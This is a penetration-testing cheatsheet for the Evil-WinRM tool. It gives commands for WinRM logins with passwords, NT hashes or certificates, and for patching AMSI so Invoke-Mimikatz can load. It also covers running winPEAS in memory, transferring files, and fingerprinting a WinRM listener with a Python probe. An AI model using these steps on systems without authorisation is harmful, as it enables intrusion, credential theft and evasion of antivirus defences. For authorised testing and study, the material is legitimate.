Ethical Hacking
d3ndr1t0x  

Evil-WinRM Cheatsheet

Evil-WinRM, created by the Hackplayers team, is a penetration testing utility for working in Windows environments once you hold valid credentials. It is a client for PowerShell Remoting (the PowerShell Remoting Protocol, PSRP) carried over Windows Remote Management (WinRM), Microsoft's implementation of the SOAP-based WS-Management protocol. WinRM listens on HTTP port 5985 by default and on HTTPS port 5986; because the traffic is ordinary HTTP(S), it usually passes through firewalls that block SMB and RPC, which makes it a convenient post-exploitation channel. The account you log in with must be a local Administrator on the target or a member of its Remote Management Users group, otherwise the session is refused even with a correct password.

For further details on PowerShell Remoting, check Microsoft’s official guide:

Enable-PSRemoting Documentation

Table of Contents

  • Introduction
  • Checking for WinRM
  • Help Menu and Features
  • Login with Password
  • Secure Login via SSL
  • Login via NTLM Hash
  • Execute PowerShell Scripts
  • Logging Sessions
  • Disable Remote Path Completion
  • Disable Color Output
  • Run Executables
  • Enumerating Services
  • File Transfers
  • Using Evil-WinRM in Docker
  • Login Using Keys
  • Final Thoughts

Introduction

Written in Ruby, Evil-WinRM simplifies post-exploitation for security professionals. From plain-text logins to NTLM hash authentication, script execution, and more — it’s a feature-rich solution found in most modern Kali Linux distributions. You can also download it from GitHub:

Evil-WinRM GitHub Repository

Checking for WinRM

Before using Evil-WinRM, confirm that the target exposes a WinRM listener. Scan for port 5985 (HTTP) and 5986 (HTTPS) with Nmap:

nmap -p 5985,5986 192.168.1.19
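The port scan only tells you a port is open. As an added example (not part of the original post or of the Evil-WinRM project), the Python below fingerprints the listener the way Evil-WinRM's first request will see it: an unauthenticated POST to /wsman on a real WinRM host answers 401 with a WWW-Authenticate header per enabled scheme (Negotiate is always on; Basic and CredSSP only if an administrator enabled them) and Server: Microsoft-HTTPAPI/2.0, the HTTP.sys banner. The function names, the lab address 192.168.1.19 and the response headers used for testing are constructed for illustration.

```python
"""Fingerprint a WinRM listener from the response to an unauthenticated POST."""
import http.client
import ssl
import sys

WSMAN_PATH = "/wsman"   # WinRM's WS-Management endpoint
SOAP_CT = "application/soap+xml;charset=UTF-8"


def classify_winrm_response(status, headers):
    """Decide from an HTTP status and response headers whether the service
    looks like WinRM and which authentication schemes it advertises.

    headers: iterable of (name, value) pairs, as HTTPResponse.getheaders()
    returns them. WinRM sends one WWW-Authenticate header per scheme, but a
    comma-joined single header is handled as well.
    """
    schemes = []
    server = ""
    for name, value in headers:
        lname = name.lower()
        if lname == "www-authenticate":
            for part in value.split(","):
                token = part.strip().split(" ", 1)[0]   # scheme before any realm=...
                if token:
                    schemes.append(token)
        elif lname == "server":
            server = value
    lowered = [s.lower() for s in schemes]
    # WinRM is served by HTTP.sys (Server: Microsoft-HTTPAPI/2.0) and always
    # offers Negotiate (NTLM/Kerberos). A GET instead of a POST gets 405, not 401.
    is_winrm = (status == 401 and "negotiate" in lowered
                and "microsoft-httpapi" in server.lower())
    return {"winrm": is_winrm, "schemes": schemes, "server": server}


def probe_winrm(host, port=5985, use_ssl=False, timeout=5):
    """Send an unauthenticated, empty SOAP POST to /wsman and classify the
    answer. Network-facing; the offline check exercises classify_winrm_response."""
    if use_ssl:
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE   # WinRM listener certs are usually self-signed
        conn = http.client.HTTPSConnection(host, port, timeout=timeout, context=ctx)
    else:
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("POST", WSMAN_PATH, body=b"", headers={"Content-Type": SOAP_CT})
        resp = conn.getresponse()
        return classify_winrm_response(resp.status, resp.getheaders())
    finally:
        conn.close()


if __name__ == "__main__":
    # usage: python winrm_probe.py 192.168.1.19 [5985|5986]   (hypothetical lab host)
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.19"
    tport = int(sys.argv[2]) if len(sys.argv) > 2 else 5985
    result = probe_winrm(target, tport, use_ssl=(tport == 5986))
    print(f"{target}:{tport} winrm={result['winrm']} "
          f"schemes={result['schemes']} server={result['server']}")
```

If Basic shows up in the scheme list the listener accepts cleartext credentials over HTTP; if only Negotiate is offered, a password or NT hash will be used through NTLM, which is exactly what evil-winrm -p and -H do.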

Help Menu and Features

To explore all available options, run the help command:

evil-winrm -h

Login with Password

If you have valid credentials, use them to open a remote PowerShell session. Note that a password passed with -p is recorded in your shell history and visible to other local users in the process list:

evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987

Secure Login via SSL

-S switches the connection to HTTPS, which by default means port 5986 (use -P to set another port). A plain HTTP session is not cleartext either: the PowerShell payload is encrypted with the session key negotiated at login. -S adds TLS on top of that and is mandatory for certificate-based login:

evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -S

Login via NTLM Hash

To authenticate with an NT hash instead of a password (pass-the-hash), give the 32-hex-character NT hash to -H. Only the NT part is used; the LM half of a dumped lm:nt pair is not accepted:

evil-winrm -i 192.168.1.19 -u administrator -H 32196B56FFE6F45E294117B91A83BF38

More details here: Pass-the-Hash Guide

Execute PowerShell Scripts

Use local scripts with -s: point it at a directory on your machine and the .ps1 files in it become available in the session. Type a script's file name to load it (tab completion works), then call the function it defines. Bypass-4MSI is Evil-WinRM's built-in command that patches AMSI in the current process so that flagged tooling such as Invoke-Mimikatz can be loaded; current Defender builds detect both the patch and the script, so expect to need obfuscation or a bypass of your own:

evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -s /opt/privsc/powershell
Bypass-4MSI
Invoke-Mimikatz.ps1
Invoke-Mimikatz

Script Source: Invoke-Mimikatz

Logging Sessions

Use -l to save a transcript of the session to a local evil-winrm-logs directory, for the report or later analysis:

evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -l

Disable Remote Path Completion

Prefer to type paths yourself? -N turns off remote path completion, which otherwise costs a round trip to the target on every Tab:

evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -N

Disable Color Output

To disable colored CLI output (useful when piping the session into a file or a logger), use -n:

evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -n

Run Executables

Need to run a binary such as winPEAS? -e points at a local directory of executables, and the built-in Invoke-Binary command loads one into the session's memory through .NET reflection, so it only works with .NET assemblies (winPEASx64.exe is one; native EXEs must be uploaded and run from disk). Type menu to list the built-in commands:

evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -e /opt/privsc
Bypass-4MSI
menu
Invoke-Binary /opt/privsc/winPEASx64.exe

Enumerating Services

Evil-WinRM has a small set of built-in commands, and menu lists them. One of them, services, prints the services on the compromised host together with their binary paths, which is useful for spotting odd service executables when you cannot drop an enumeration tool on disk:

menu
services

File Transfers

Upload a local file to the target (the second argument is the remote destination; . is the session's current directory):

upload /root/notes.txt .

Download a file from the target to your machine:

download notes.txt /root/ddrt/notes.txt

Transfers are carried inside the PowerShell session rather than over SMB, so large files are slow; keep tooling small or stage it by another route.

Using Evil-WinRM in Docker

Don't want to install it locally? Run the published Docker image instead. Paths given to -s, -e, -l and upload refer to the container's filesystem, so bind-mount (-v) any local directories you need:

docker run --rm -ti --name evil-winrm oscarakaelvis/evil-winrm -i 192.168.1.105 -u Administrator -p 'Ignite@987'

Login Using Keys

Authenticate with a client certificate and its private key instead of a password. WinRM certificate authentication only works over HTTPS, so -S is required here (and the port defaults to 5986); the target must also have certificate authentication enabled and a mapping from the certificate's subject to a local account:

evil-winrm -i 10.129.227.105 -c certificate.pem -k priv-key.pem -S

Final Thoughts

This guide outlined Evil-WinRM’s core functionality and hidden gems that simplify internal assessments and CTFs. From basic login to script execution and binary injection, Evil-WinRM remains a powerful tool in any pentester’s arsenal. A big thank you to the Hackplayers crew for creating it. Happy hacking!

 
